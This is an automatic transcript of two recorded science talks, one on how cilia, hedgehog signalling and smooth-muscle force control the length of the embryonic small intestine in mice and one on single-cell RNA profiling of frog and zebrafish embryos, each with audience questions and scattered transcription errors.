noon, that's a half a day. This is just the convention. So at about embryonic 13 and a half days you have a single, simple layer of epithelium and around 15 and a half you have villi, the no-cryps. The cryps in a mouse and in human don't really start to form until after birth. So in adult you have these cryptophilus units with different cell types. So going back to this, excuse me, I need a glass of water. Only in France can you get this nice fizzy water without having to go to some fancy system. Remember we talked about you have a characteristic diameter like the stomach is very wide and you have a characteristic length. Now the control of the length is a fundamental and almost completely unanswered question unlike diameter and why is diameter so hard to know? This is why I said to you, when someone asked this I think in the front row, we're talking about geometry here. Although I suppose you would say this isn't really geometry because we don't have any Euclidean proofs. Why is it so hard to know? Well the problem is the intestinal epithelial tube is tightly coiled by the associated connective tissue. When you dissect it out what you get is this tightly coiled bundle. And there's that connective tissue that holds it in this tightly coiled bundle. And for even a very skilled, practiced dissectionist person, it takes 15 or 20 minutes to dissect the tube free from this and the connective tissue then collapses. And that takes about 15, 20 minutes of work to do this. And no one ever bothers which is why, oh yes Tommy. Why don't you just do a name all right? Well you can do this now on people or on babies. I don't know that anyone has gotten this working on mouse routinely. Maybe you have this now on mice but it's not part of the routine characterization that I know. If you look through dozens and dozens of phenotypic reports of mouse mutants, I've never seen anyone report on intestinal lines. It's just not done. It's not part of the phenotypic report. I suppose with MRI maybe it could be done. And maybe with their, I think it could be done. It isn't. I haven't seen it done. Pardon? It will be. It will be maybe. It will be maybe. I haven't seen it done. And so I haven't seen it done. So you can look through, it's not routinely done at this point. And so there, when you get, someone characterizes a new mouse mutant that dies at some point either in utero or at birth or sooner or after. It's not a routine part of the procedure. So okay let me just say this. It's now, you can routinely knock out, you know, there's about 20,000 genes in the mouse genome or the human genome. And you can knock out, people are systematically, systematically, excuse me, knocking them all out. A lot of them have no phenotype under normal lab conditions, which doesn't mean anything by itself because it may be that they have a phenotype under some kind of stressful conditions or a phenotype when they are combined with some other knockout or some other mutant, meaning a synthetic, what's called a synthetic phenotype. But okay, so, and there's a whole list, standardly, of say, ones, if you have a mouse that says dies at birth or dies in late embryogenesis, there's a whole long list of things that are normally measured or normally examined. Intestinal length is just never examined on anything that I've ever seen. So that's why we don't have data on intestinal length. Okay. Okay. Okay. Okay, okay, okay, I think I have my slides out of order. Okay. Okay. Oh, I'm sorry. Going the wrong way. Okay. So there are some humans that are born with very short intestines and these are called short bowel syndrome. Okay. So in these people, babies generally, the small intestine is so short that they do not have adequate nutrient absorption. So as I mentioned, the goal, the main role of the small intestine is to absorb nutrients and if it's more than about 50 to 70% too short, shorter than normal, you don't have adequate nutrient absorption and the baby is basically malnourished and starved to death. This is a high morbidity and mortality. There are 9,000 cases per year in the US. The only treatment is IV nutrition and that works very poorly in the long term. They essentially die because you can't get real adequate nutrition. There are things that don't work in the long term and the only cure is an intestinal transplant and that generally doesn't work in the long term. So there have been mutations in a few genes that have been mapped. These are just the abbreviation names of these genes but there's been a little further investigation of these. And one thing I'll mention here is that regeneration of the small intestine, which I'm not going to talk about, but regeneration of the length of the small intestine is a long term goal although it's not what I'm directly talking about. Now radially, as I said, a single stem cell can regenerate an entire cryptophthalous axis and it can actually make it bigger than normal. You can make, if necessary, if you stress the intestine, the intestine can get wider than normal. But longitudinally, the small intestine never regenerates in length. So if it's too small at birth, it doesn't get bigger. It normally grows a great deal. A baby's small intestine is much shorter than a full grown adult's small intestine. But if it's 50% too short at birth, it will be 50% too short in adult if it lives that long. So our goal is if we understand the control of the length of the small intestine, it may ultimately enable us to have some kind of therapy to increase or generate the length of the small intestine in short bowel syndrome. A lot of cases of short bowel syndrome are because for some external reason we have to remove part of the short bowel, like if it's damaged for some reason. And I won't go into all those things. Now intestinal cell kinase, which I will talk about at some length to explain to everybody, and I'll tell you that both the biologists here and the mathematicians and everyone in between probably don't know about it, provided us with a serendipitous clue to intestinal length control. So intestinal cell kinase is a ubiquitous serine 3-in-ine kinase. It's a class of kinases for those of you who are mathematicians. Kinases are enzymes that add phosphate groups to proteins that are involved in signaling. It's pretty obscure. It hasn't been studied much at all. It belongs to a very obscure family of kinases. It's particularly abundant in intestine, but it's found in almost most cell types. Now the way we got into it is it was a substrate of a cell cycle related kinase, which Ying Yang was studying as a PhD student in the lab of Tommy McKayla at the University of Helsinki before she came to my lab as a postdoc. And another little bit of serendipity. So she wanted to come to the Bay Area because her husband was a computer scientist. She came from someplace in China to do her PhD with Tommy McKayla because he had a fellowship available. And her husband came to graduate school in Helsinki to study computer scientists. And he worked some years ago for Nokia, when Nokia sort of really existed as a cell phone company. And he helped develop this cell phone game called Angry Birds, which some of you probably have heard of if you're old enough. And so Nokia sort of went broke. But Facebook was interested in cell phone games. And so they hired him. And so he moved first to the Bay Area to work at Facebook. I have a connection to Facebook, unfortunately. I never use Facebook or any social media. But the guy who founded Facebook was his name, Zuckerberg. His wife was a medical student at UCSF. And so since I teach all the first year medical students, I give them one lecture on epithelial cells. And so I must have taught her some years ago for better or for worse, although I have no memory of this. My lecture now on epithelial is now on the web. So they don't even get to see me in person. They just get to watch me as a talking head with slides on the web. So here we go. OK. Now, intestinal cell kinase. You don't have to concern yourself with any of these details. But there's a way of making a mutant mouse that lacks it. And you can just buy the sperm for this. As I said, all the genes, every gene in the mouse has been knocked out by some consortia. And you can just buy the mutant sperm and breed the mice. And she made an intestinal cell kinase knockout mouse. And while she was doing this, two other labs published the same mouse. But she was very thorough. And unlike these other two labs, she dissected out the small intestine because she didn't know better that no one bothers to dissect it out. And so she dissected out the small intestine. And lo and behold, it was shorter. So I'm going to use this pointer. So this is the small intestine, stomach, small intestine, the cecum, which is a structure that at the end of the small intestine, dividing the small intestine from the colon. And mice, I think, don't have an appendix. Oh, yeah, they do. They do it here. The appendix is what gets taken out by doctors in all the movies and things. And the small intestine was shorter in the mutants. And so it's much shorter. So this is actually a graph. Over time, 13 and 1 half days through 18 and 1 half days, you can see by 18 and 1 half days it's much shorter. This is the wild type. And this is the mutant. The large intestine is also shorter, but it's harder to measure as reproducibly. So possible mechanisms by this happens. So one is that there could be decreased proliferation of the cells. She's done just one experiment to look at this. It's promising. So one way of measuring proliferation is you inject into the mice a nucleotide, a called EDU, which is an analog of thymidine, which gets incorporated into the DNA and is fluorescent. You can detect it fluorescently. And so the blue is a mutant. And the black is the wild type. You can see there's a small, but statistically somewhat significant difference here. These are the epithelial cells. And these are the mesenchymal cells that surround it. I'm going to explain that more in a minute. She needs to reproduce this using different variations of this experiment. There are a few other possible mechanisms. It could be cell death. It could be more cell death in the mutant. We haven't detected that. And there could be a change in orientation of cell division. That is, the cells, when they divide, you could have the cells instead of dividing next to each other in the longitudinal axis, they could divide next to each other in the radial axis, the circular axis, around the circle. That happens as the tube would become wider instead of longer. And that actually happens in long airway development, as shown by our colleagues in UCSF, Gail Martin, and Wallace Marshall's labs in airway development. The airways, as they branch, they change the diameter in their length. But the shortened testings that we see are unchanged in diameter, at least as far as we've measured it. So let's talk about intestinal cell kinase. So intestinal cell kinase is concentrated in primary cilia, which I'll explain, though also present in cells that lack cilia completely. So could cilia be involved in intestinal length control? So there's no previously reported link between cilia and intestinal length. And there's no previously reported link between cilia and any aspect of intestinal development. OK. So what are cilia? So cilia comes from the Latin word for like eyelash, like supercilious. I don't know if that's a word in French. It's a Latin word. It means like high eyebrows. So is that a word in French? Prune? Eyebrows? Cilia? I don't know. I'm just trying to explain this to the non-sobialogist. So cilia are little projections, very skinny little projections from the surface of the cell. This is what they look like by scanning EM. And this is what they look like if stained with appropriate marker. So primary cilia are, most cells in the body have one cilia projecting from them that are non-motile. There are other kinds of cilia that are motile that whip back and forth. And they have, cilia have a core of microtubules that are called the axonim. And then they have a membrane surrounding them. At the base they have a centriole that turns into a basal body. And cilia contain more than 500 proteins. But mutations in many of these, of any of the genes that code for these proteins cause diseases called ciliopathies. So there are at least 125 known ciliopathies. And many of them affect many organs. They affect the retina, skeleton, a liver, cardiac defects, brain, kidney, kidney cysts are one most common. But notably the small intestine is not known to be affected. So you need to sit down for me. My back is really getting to me. Don't think I'm really bored. Okay? As I said, I have terrible back problems and I just can't stand. And I think some of the people who came in late missed my point about, I'll be glad to show you my back x-phrased if you want. Can we see it? Pardon? Can we see it? I don't want to talk, but I have slides with them. I have scoliosis with a 72-degree curve. So this is a normal mouse that E16.5 and this is an ICK mutant mouse. It's got facial distortions, polydactyly, extra digits, gross edema, face problems. So it corresponds to the human disease, Echosyndrome endocrine cerebroastoid dysplasia, which is perinatal lethal. The mice and probably the humans die of respiratory failure at birth because the lungs are messed up so they can't breathe when they're born. It's very rare in terms of cases reported, but I think that's probably because, first off, it resembles a number of other perinatal lethal syndromes. And the only way you can diagnose it is by sequencing. In places with advanced healthcare, if you do an ultrasound, you'll see it's a grossly distorted fetus that's incompatible with life and it would get aborted because it's going to die at birth. And in places, and those aborted fetuses, generally no one's going to pay for sequencing. And although I did tell some people that I had my own genome recently sequenced for $350 from a new company called Genos.co. And $350 is quite cheap. People used to talk about a $1,000 genome, but if you can get it done for $350, but no one's going to pay for that usually. And if it's in a place that doesn't have advanced healthcare, it'll be born, it'll just be still born. Most of all the cases that have been reported are consanguinist families, and so generally tend to be in places that don't have advanced healthcare. So it's not easy to diagnose, you can only diagnose it by sequencing because it resembles a number of other severe syliphthys. So the psyllium is assembled and maintained by intraphlegia transport, which was discovered by Joel Rosenbaum at Yale using chlamydomonus as a model system because you can see things most clearly. So there's anterograde transport and retrograde transport, which moves particles up and down. And depletion of ICK causes a bulge in the cilia tip. This is the ICK depleted. This was in cell culture, although you actually do see this in cultured cells from an ICK fiberglass. So that is generally characteristic of a decrease in retrograde transport, so things that get to the tip and then accumulate there. And what Ying did is actually collaborate with Hero Ishikawa with Wallace Marshall's lab at UCSF who has the turf microscope and he could measure live imaging of IFT cargo in IMCD cells, which have long cilia in culture. And so he measured the rate of IFT speed, antrugrade, which was unchanged, and retrograde, which was decreased. This is an actual movie of live imaging, so we can measure the velocities. So with a loss of ICK, there was a reduction in retrograde intervejeuiler transport and accumulation of cargo at the tip of the cilia. Now, so with Jeremy Ryder's lab at UCSF, he had three other severe ciliopathy mutants that all died at birth, around birth, and perinear lethal. And they all have human ciliopathy dissociated than what are also all perinear lethal. INPP5E is a lipid phosphatase concentrated in cilia. B91 and TCTN3, it's tectonic 3 are required for cilia formation. And they're all expressed in this fetal small intestine. And he had made the mice for these. And all of them also had short intestine. Here, INPP5E, B91, and tectonic 3 had short small intestine. They were less severe, but that just could simply be a matter of penetrance or of timing, when they actually get turned on in the small intestine. So summary part one, I know I'm covering a lot, the length of the small intestine and epithelial tubes in general is an unsolved and fundamental problem. I keep on telling Ying in terms of when she comes once again on the job market, that she's sort of discovered a whole new problem that people just have been sort of ignoring. The only people who have worked on tube lengths are in Drosophila trachea, which is a different thing, it's post-myototic, takes place without cell division. And there's a translational relevance of short bowel syndrome, and the small intestine never regenerates in length. So there's, and everybody talks about regenerative medicine, and this is a whole area that is wide open. And ICK, well, three of the cilia genes control intestinal length. Okay, now, the second issue, we get into real developmental biology. Okay, and so I've got some very elementary slides here. So an epithelium, I've been studying epithelium my whole career since, my whole graduate school career since 1979, when I started grad school with Gunter Global, who just passed away three weeks ago at Rockefeller. And he had spent 51 years at Rockefeller, won the Nobel Prize. So an epithelium is a tightly packed layer of cells that divides one surface from another. It's a topological division. It's, in biology, you can think of it as a two-dimensional surface, although it's really not exactly two-dimensional, but you think of it as a two-dimensional thing. And underneath, essentially, epithelium is a basal lamin of a thin layer of connective tissue, extracellular matrix, and underneath that is a layer of mesenchymal cells during development, which is loosely packed. Now, this is development, okay, loosely packed cells. Now during development, there is bi-directional signaling between the epithelium and mesenchymal, mesenchymal by several signaling pathways, which are the blue arrows. And one major pathway is the Hedgehog pathway, which was developed, which was discovered, of course, in Drosophila, and named the Hedgehog because in the great classic screening by Eric Wieshau and Janine Nusslin-Walhard, who did this great classic screen at the European Electrobiology Lab, the EMBL, for which they won the Nobel Prize years ago, the flies looked like hedgehogs, okay? Hedgehogs, of course, only grow in the old world. They're not indigenous to the New World, although I'm told, and I've read, that one species of hedgehog that come from Africa, one type of desert hedgehog, have become very popular as pets in the US and elsewhere. But we thought about getting them as pets for the lab, but they're illegal to have as pets in California, it turns out. So that ended that idea. So anyway, the Hedgehog signaling pathway requires invertebrates cilia, although actually does not require cilia in flies, as it turns out. And it was Catherine Anderson who discovered that the Hedgehog signaling pathway needs cilia for signaling in mammals, but not in flies. So the hedgehog pathway involves a hedgehog ligand, which is secreted by one type of cell, generally epithelia, and binds to a receptor called patch on the receiving cell, and patch is on cilia. So the receiving cell requires, oops, sorry, requires intact cilia for hedgehog signaling to function. So when the pathway is off, patch is on the cell surface, but it is not in the cilia. This is a simple diagram of the cilia. Cilia here is rather not very long, just to fit it in here. But when hedgehog ligand comes along, it binds to patch, and that causes, patch stays here, and it causes smoothened to move from inside the cell. Smoothened is here to move to the cilia membrane, and that causes glee. Glee stands for glial blastoma, actually, to bind, to cause glee to bind to the microtubules inside the cilia, and glee gets proteolytically processed and moves into the nucleus, and glee is processed to what's called a glee activator, and binds to the DNA in the nucleus, and causes transcription of hedgehog responsive genes. And the hedgehog, this whole hedgehog pathway, is involved in developmental events in many, many different tissues. And this is a major developmental pathway in many, many different tissues. Okay, including, we think, control of intestinal length. Okay, so now hedgehog ligand, generally in many tissues, secreted by epicyl cells, and binds to patch receptor on the cilia in mesenchymal cells. And one particular reason for thinking this is an intestine is that in a small intestine, the intestinal cells generally don't have cilia, except at very early times. They have cilia at embryonic day 13.5, but they lose them in a few days after that, and by embryonic day 15 or 16, the cilia are gone. But the mesenchymal cells have cilia all the time. Okay, so what we think is happening is that the epicyl cells are secreting hedgehog ligand, and it's acting on cilia on the mesenchymal cells. Okay, now one way to test for this is that we can delete ICK specifically in the mesenchym. And this involves some engineering trickery that's been developed. Dermal 1 is a promoter that causes expression of genes in mesenchymal cells, and it, oops, and it expresses, oh, that's not me, is it? Okay, it expresses Cree, which is a recombinase, which acts on these flocks sites. This is some modern day genetic engineering, which causes the excision or loss of ICK specifically in the mesenchym. The loss of ICK specifically in the mesenchym causes short small intestine. We can see that here, embryonic 15 and a half and embryonic 17 and a half, the black versus the white. And so ICK is therefore acting in the mesenchym, and I can just tell you, if we do the reverse experiment and lose ICK just in the epicylium, it has no effect at all. I'm not showing you that. Now, I'm just going to show you some old results published by Andy McMahon's lab in 2010, and Jun Hal Mao, who has, Andy McMahon is, he did this experiment when he was at Harvard. He's now directs an institute at the University of Southern California, and Jun Hal Mao I think is at the University of Massachusetts when he did these experiments. If we, when these guys deleted the hedgehog ligands, and there are two of them in the intestine that are redundant, sonic hedgehog and Indian hedgehog, and I'll tell you that the sonic hedgehog is actually named after the sonic hedgehog video game character. And when you deleted both of them because they're overlapping and redundant, this is the entire intestinal tract from the stomach all the way out, the small intestine, large intestine, the whole intestinal tract shrinks by 90%, not just like the 70% or something that we can get, but 90% because it's a much more efficient, complete shortening. Okay, so this is their old result. Andy McMahon is one of the titans of the hedgehog field in mice. So this we know that the hedgehog can do this, the hedgehog is needed for this, but that we wanted to go on and find out, well, and you know, I talked to Andy, you know, I don't know, two years ago or something about this, and he said, oh, it's just hedgehog. But then as a cell biologist, I said, well, how does hedgehog do this? You know, Andy's content to just say it's hedgehog, but you know, I want to know how does hedgehog do this? Well, first off, two factors that are downstream of hedgehog or need for hedgehog to work, glee, which is this transcriptional activator and Pax, which is the receptor, are decreased in the ICK knockout relative to the control. So that's glee here and Pax, and you can see they're both decreased, the black bar and versus the white bars. And so how did the decrease in hedgehog signaling lead to short intestines? So we asked, could change in mechanical force be involved? Because everybody in cell biologies been working on mechanical force, and I have to say we were partly inspired by Cliff Tabin, who is my classmate from my undergraduate days in Chicago, and his student Amy Shire, who's now a fellow at Berkeley, as Dave Drew can tell us. You know Amy, don't you? She's one of these fellows at... She's in Richard Harlins. Yeah, she's in Richard Harlins' lab. And so there's the epithelium, which is a single layer, and it's surrounded by mesenchymal cells, and some of those mesenchymal cells are precursors to the smooth muscle cells that surround the intestinal epithelium. So I showed you about mesenchymal cells. Now some of them, our intestine has a single layer of epithelium, which absorbs the nutrients, and it's surrounded by, you know, as I mentioned, I teach histology, or I used to teach histology, to medical students. When I was a medical student in 1977, I started, we took, I had, am I running out of time? Okay, then I'll stop telling stories. Okay, so become smooth muscle cells, and these smooth muscle cells contain alpha smooth muscle actin, and that can produce mechanical force. So here in the control, we stain for smooth muscle actin in green, and blue are just the nuclei, the DNA. And in the intestinal cell, chines, mutant, the smooth muscle cell actin are very disorganized, and we know from other people's work that these smooth muscle actin that are disorganized probably produce much less mechanical force when they're disorganized like that. Now so then there's this protein called YAP, which everybody works on now, and YAP, which stands for Yes Associated Protein, is a key mechanosensitive transcriptional regulator. So both biochemical and mechanical cues control the movement of YAP between the cytoplasm and the nucleus. So YAP is inactive, but when it moves into the nucleus, it becomes a major regulator of cell proliferation and organized control. And in YAP is here in red, and you can see this is the control, a lot of it's in the nucleus, but here a lot of it's in the cytoplasm, it means it's diffused, you don't see it, especially it corresponds to collocalizers, where there's a lot of the smooth muscle actin, which is sort of much more disorganized compared to the control. So the summary, again, just to repeat, the length of the intestine and tubes is an unself problem, there's a short bowel syndrome, small intestine never regenerates in length, and a number of cilia genes control intestinal length. Cilia likely control intestinal length through hedgehog signaling in the mesenchym, hedgehog probably acts in mechanical force generated by smooth muscle actin and mesenchymal cells surrounding epithelial cells. Cell force probably acts through YAP, mechanically sensitive transcription regulator. So Yang Yang did all this work with help with Jeremy Ryder's lab, Wallace Marshall, Hiroki Shikawa, and Tommy Mikhailovic started this with Peckett Pavinet, an undergrad who actually came to visit us one summer two years ago, Johann Piranen, who's in Tommy's lab, funding from the usual suspects. Thank you. I'm sorry to take up so much time about math, but you did make me start eight minutes late. Tommy has a question? So how do you know that? I can never answer his questions. Yes, go ahead. Try. Try. Yeah. How do you, in the last part of your talk, how do you establish that the relationship is causal and not causal? Spocal and not correlative, we haven't yet, but we are going to. And the way you presented it, you said it was... I said may. I always had a may or might. But we're doing experiments like killing all these smooth muscle actin cells, because what you can do is you can put, we're in the middle of doing this. Actually, we have some results that are looking indicative. You put the smooth, you use a smooth muscle actin from motor hooked up to diphtheriotoxin. So that kills the smooth muscle actin expressing cells. And that restores the length of the intestine. So it's the opposite. What? The opposite, right? No. If you get rid of smooth muscle actin contractility... Yes. What? Is this right? Yes, the opposite. I'm trying to remember this. If you have no contractility, well, it doesn't make it short or long. We're going to make it short, okay? But we're also manipulating yap activity. Okay? You manipulate yap activity and you manipulate actin contractility, you manipulate those independent of the upstream things like acilia. We're manipulating those things independently. Okay? And that can establish causality, or at least begin to establish causality. Okay? That's the basic key. Keep your questions over here. In what cells do you see changes in yap? In what? In epithelial or the mesenchymal? Mesenchymal. Yap is mostly active in epithelial cells. Well, these cells are... That's where it controls cell survival and cell proliferation. Well, here we're seeing... I don't know that yap is important in mesenchymal cells. No, here we're seeing it in mesenchymal cells. Okay? It's interesting. These cells are the ones that have mechanical force. It's strange. No, but yap is in a lot of cells. Yeah, but the yap phenotypes are usually epithelial. No, we can... Well, here we're seeing it in mesenchymal cells. We will manipulate it. As I said to Tommy, we are manipulating... Our plans... I don't know if we have a result. Our plans are to manipulate yap and act independently of the cilia and hedgehog. Okay, so that will give us something. Yes? What is the ICK target? Our ICK is a kinase. I know. What is the target? Well, we have... Okay, so we are doing that using the... The Keven Showcat techniques. With that, you can identify the Keven Showcat using artificial substrate. You can identify the direct target. But that's not the point. H-hug is phosphorylated by ICK. Pardon? H-hug is phosphorylated by ICK. Okay, I can't run. H-hug is phosphorylated by ICK. Is hedgehog phosphorylated by ICK? I don't know, but the issue is it doesn't matter because other cilia genes give the same phenotype, which are not kinases. So ICK... It's not ICK per se. It's cilia that are needed. Ah. Okay? Three other cilia genes give the same phenotype. So it's not limited to ICK. ICK was fortuitous. Yes, the question is why ICK is required for cilia. No, ICK is not required for cilia. ICK is required... Is ICK stimulates retrograde transport. But ICK is not required for cilia. And three other cilia genes, at least three of the cilia genes, give the same phenotype, which are not kinases. Okay, so... At each stage of embryo development, actually, this... I'm sorry, I can't hear you. At each stage of embryogenesis, this length being determined. A length of the... Of intestine being determined. At each stage. Which stage? It's a continuous process. So it's not decided where anomaly happens, at which stage the development anomaly happens. It's a long process. Yes. And it continues postnatal. I mean, the intestine continues to grow until the organism reaches adult. I see. So anomaly happens if it attracts all development, or they make it slow everywhere, or what? So it becomes slow in every way. It stops, right? It becomes slower. Or something stops. Some stage stops. Or everything becomes slower at some stage. I don't know that that's known. But I know that the intestine continues to grow in a human. The intestine is approximately three times body length. Okay. Now, it varies in species, depending on the diet. So in general, carnivores have shorter intestines and herbivores have longer intestines. That's a species difference, and that's a very different question. No, no, no. My question is time. Time dependence, yeah. Yeah. Time dependence. I don't know that that's been studied in great detail, but it's growing throughout both embryogenesis and postnatally until you reach full adult length. But anomaly happens at which stage? When you see something develops slower, it's kept as early or later? Both. And when we see it? What's the first stage? What difference do you mean? Perhaps we should continue this at the coffee break. Yeah. The two of you. So let's thank Keith while he's searching for the picture. Yay, and thank you for your job, and good luck.
|
Most internal organs consist of tubes lined by a single layer epithelial cells; these tubes usually have a characteristic length. For most organs, little is known about how the length of these tubes is controlled. For example, the small intestine of mammals has a defined length, though very little is known of about the mechanisms that control this length. If a portion of the small intestine is damaged due to disease or injury, either embryonically or postnatally, the length of the small intestine never regenerates. We have uncovered a portion of pathway that controls the length of the small intestine during embryonic development.
|
10.5446/50892 (DOI)
|
Right, so this is supposed to be a title of my short talk. I thought I will start by introducing myself and telling you why you might want to catch me later and talk to me about miscellaneous things that I do. I'm kind of a weird species of scientist, you'll see why. Perhaps I'm most interesting not as a scientist at all, but as a guinea pig. I think I can substantiate the claim that my own genome is the best characterized human genome on the planet among genomes which are available. So it's been selected by the American National Institute of Standards as the genome to have a standard genome. And then if that picks your curiosity, I'm happy to comment some more. This is a book cover of my dissertation which was done in the field of machine learning and artificial intelligence. And you see that nowhere there it talks about biology. And so my one, maybe a most known contribution from the point of view of machine learning to biology is this paper which I'm a lead co-author of and I'm happy to say it's been cited something like 7000 times in seven years. Pretty good. So Rudy and I think a couple other people mentioned the system polyphen. In 30 seconds this is a server and method which takes human protein and tells you whether this amino acid substitution is going to change the function of this protein. So it's the best, the most used system. I can tell you it's only slightly better than the coin flip, but it's the best. So at some point still being machine learning guy, I run into Mark Kirchner whom I believe most of you know and he suggested I come to the department, spend a few months, find application for machine learning. It's been many years. I'm still at the Department of Systems Biology at Harvard Medical School. And I actually do some of my own experiments which all look very much the same. I do in vitro fertilization, usually it's with frogs, sometimes other species. And I stand there with a clock watch, with a stopwatch very carefully timing and killing embryos at certain points and then I ask what are those made of? RNA, protein, other molecules and try to reason about systems. So this is I think a two-year, maybe three-year-old story now. But again, I just wanted to give you a glimpse of. It's already, so there are two interesting points here which are going to become relevant later. If there is a system where for several time points you measure in parallel RNA and protein just from those measurements alone with no isotopic labeling, you could fit two parameters simple model and recover synthesis rate and degradation rate. And so we've done this for genome scale at that point and redoing this now. I don't think I need to tell you that synthesis and degradation rates for proteins genome-wide are important and useful in many ways. One kind of systems embryology application that I'm proud of, I don't think there are many questions in biology where you can ask a question which results in the number. So here's the question. If I take an embryo, which is a tadpole, swimming, breathing, fish with a beating heart, I put it in the mixer, I reach in and they take a molecule. Was this molecule of protein synthesized in the embryo or was this deposited by the mother? And so this graph here gives you an answer that after 50 hours in this, after fertilization in this organism, about 30% of protein molecules are made new. So this tells you something about the systems, how embryo prepares protein versus makes protein on the fly, different proteins specialized for some cell type versus housekeeping and so forth. How do you measure the new... I'm sorry? How do you measure the new... That will take me about an hour to explain. So yes, please come to my poster for this. So then this is to say I've been fortunate to be part of the team that developed the so-called in drops, a droplet barcoding protocol which allows you to look at expression of RNA at a single cell level. So when you take a system and you get mixed population of cells, what comes out of this experiment, whatever you do it with, is a giant matrix of cells by genes. What do you do with it? Is a big question. So you could try to reason about clusters in this population, but they're not necessarily clusters. You could try to reason about the whole manifold, but what kind of manifold? Those are questions which are ripe for mathematics, I think. So we were very lucky to get Caleb Weinraub, the student who developed the system of representing such data that really enabled this field, I could say. The first thing I asked you to take the mental image of is a system called spring, where every point is a cell, and then two cells which are very similar in the space of gene expression are linked by spring. So it relaxes and becomes a manifold representing something. So what did we do with these tools? Well we went back to my favorite kind of experiment. We just took time points of developing embryo. We stuck it into the single cell profiling setup, and I must say this is a teamwork of two very talented students and two lab heads. And you get this sort of data. So what is this massive slide tells you? There are 10 time points in development where each time point has many thousands of cells. It's a giant, I think it's probably the biggest to this data set of its kind of 130,000 individual cells. What do we do with this data? So one idea is that you take adjacent points and connect them to developmental tree. Very roughly it works like this. You start at the last point, this is last time point, you find a state, you choose a parent state in the previous time point, and then you iterate, that gives you a tree. So that's great, the tree is very helpful. But you can also take all of 130,000 cells, put it into spring, and get this kind of a manifold representation. Now we can stop doing embryology with this data. Because if you think about this, all sorts of reverse engineering of biology can come out of this data set, and this is what I'm going to be busy doing for the next 15 years, I think. Because first, there's time dimension. You could see that stem cell somewhere here starts and then a few hours goes out on the bridge and differentiates. You can ask which genes are important. You can reconstruct cascades of transcription factor chains and so forth. You could look at the branching point and ask how decisions are made. You can simply ask which genes co-vary absent and present together. You can begin to get all sorts of systemic information like protein complexes out of this. Finally, thinking back to the beginning of my talk, you can get synthesis and degradation rate and turn RNA, which we can measure, into protein, which we cannot and will not be able to measure in a single cell level for decades, probably. So with this in mind, we thought, well, we could spend 15 years analyzing this data, but it's already a very rich resource. Just a month ago, I organized what we called single cell jamboree. In earlier HHMI generously sponsored this meeting where we invited 26 mostly very advanced senior people in the field of embryology, specifically embryology of frog, to come, be trained to use our tools and look at this data. So what is there? Jamborees, which happened for genomes when people just sequenced drosophila, for example, and looked to understand what genes mean. Now this is the first ever similar effort where an expert in kidney and blood and neurons went and said, all right, recognize some genes, I don't recognize others, annotate and give us bona fide sets of cells which are differentiated or differentiating. And so again, in itself, it's going to be a very rich resource, just very briefly, the whole effort were organized after like this. So this is our tree, this is a giant poster that we had on the wall there, and each expert received a small subtree here, took all of the cells, which are tens of thousands of cells, which are just between two adjacent time points, and popped this substructure out in the browser in order to understand that particular snapshot in the process of differentiation and wrote a short assay about this. So what are recognizable markers, what are novel markers, are there any new cell types? This sort of information falls out of that. As if frog data was not enough, we compared this whole tree in frog to a matching effort also from our department in zebrafish and asked about conservation, are cell types conserved are the same genes used in the same way in this process, do cell types fall out of the tree through the same root and so forth? So again, there are some surprises here. So at this point, I think it's clear that with all of this information, my talk looks to you like a paper which unfortunately I think becomes kind of too popular in major journals now. I call it revolutionary technology enables unprecedented deep and expensive data set which confidently reveals a new depth of our ignorance about embryogenesis. So I would appreciate a chance to convince you otherwise but that will take some time and effort at the poster. Today. In 15 years, you want to give 15 years to do. Right, so I think I can open for questions. So on your previous slide, was the zebrafish and xenopost data independently processed, in other words, are they independent trees? I don't understand the question independently dissociated, independently collected, independently went through the setup. Oh, yes, absolutely independently analyzed through the process which I sort of illustrated here. So you just cluster every time point from the marker genes in that cluster, understand which cell type is that and connect backwards in time and get to trees. So both trees show a perhaps surprising characteristic of very early divergence, in other words, there's This was one of surprises. Absolutely right. So there was a huge effort by community to create this kind of ontology and we compared. So mostly consistent but many cell types look to be emerging much earlier than we thought. One of the goals of the new Chan Zuckerberg Institute is to find the human cell atlas to find all the cell types in humans and that seems to me maybe you've already done that for xenopus and zebrafish or? Yes, I think so. Also mind you that they're working with dead people. What creates for certain bias in the cell type? So how many cell types? I mean, how I guess it depends how you define a cell type. This is Kirchner's question. I really hate it. This is like how many colors are there? Right, you can zoom in and things would cluster and cluster some more and cluster some more depending on which genes you would look at. So you can kind of very rapidly get lost in this universe of representation. So I think it can be defined rigorously. We are talking about 300 cell types. Mind you this is early development. This is gastro-neurola. And so there are probably thousands of cells we never see in this. Thousands of cell types we don't see here. So how do you know the linkage between the cells? I didn't get that. At different stages, how can you link them? So about any two cells or any two groups of cells, you can just ask, are they similar in the space of gene expression? So you just say this sample, which was taken two hours later than this sample, contains a few cells which look a lot like these cells, yet different. And that's how you make this decision. So in this analysis, you lost the location of the cells in Denver, right? Yes, we did. Is that important? It's super important. There are several labs aggressively working on the ways to inject the plasmid, which will allow you to reconstruct the true lineage by barcoding, but it is lost in this data. You can recover a lot of it because there is a very rich set of in-situ for this embryos. And so just going by markers, you could register the cell based on its expression profile to use several in-situ. So let's suppose that you're having a symmetric division. You have a symmetric division going on already at this stage. So how could you, how do you know, since it's a symmetric, the properties also are a symmetric, so how can you link now to the common? I don't think we can do it perfectly. I mean, this is a good example of things we're not going to see until we sequence deeper, and I also don't take samples two hours apart. I take samples, you know, maybe 20 minutes apart so that they have enough cells which are similar enough. I think that's what it boils down to. Right? I don't believe that asymmetric division will create two cells which are completely different from one another. Most of the genes are probably going to be similar, yet they're going to be principal differences in transcription factors and signaling molecules. Maybe not. So why did you pick Xenopus and not Rosophila? In Rosophila you can actually back everything with genetic analysis. It's impossible to do genetics in Xenopus. It's only descriptive. Well, I can give you. We can do genetics in Xenopus. Would you like a polite or an honest answer? Can we have an honest answer? Okay, seriously speaking, large cells are important. We're looking only at about, let's say, 1 to 5% of the transcriptome. The rest is getting lost in the pipes. And so, giant cells. One important reason. You can do morpholinos and CRISPR knockouts in Xenopus. You can do a lot. I don't think there's Rophila's in any way superior to Xenopus, but that's being a groupie. Do you think, when it's just dissociating the cells, how does that impact the profiles? I could talk for hours about adventures of finding dissociation protocol. So that's very important. I think it introduces very little bias. And we had to work it out three times. It took a year to work out in three different species that we've done. I didn't mention the third species at all. But a brief answer is, you dissociate rapidly and within minutes everything is on ice. So most of the processing happens on ice. There are probably some response, but... So I realize your analysis is in progress, but can you give us a little bit of a flavor for... You should start seeing blood. I'm not supposed to say this, but I think it's coming out in science pretty soon. Okay, so what's the difference in your map versus the classical hematology? As far as it's... Classical hematology? 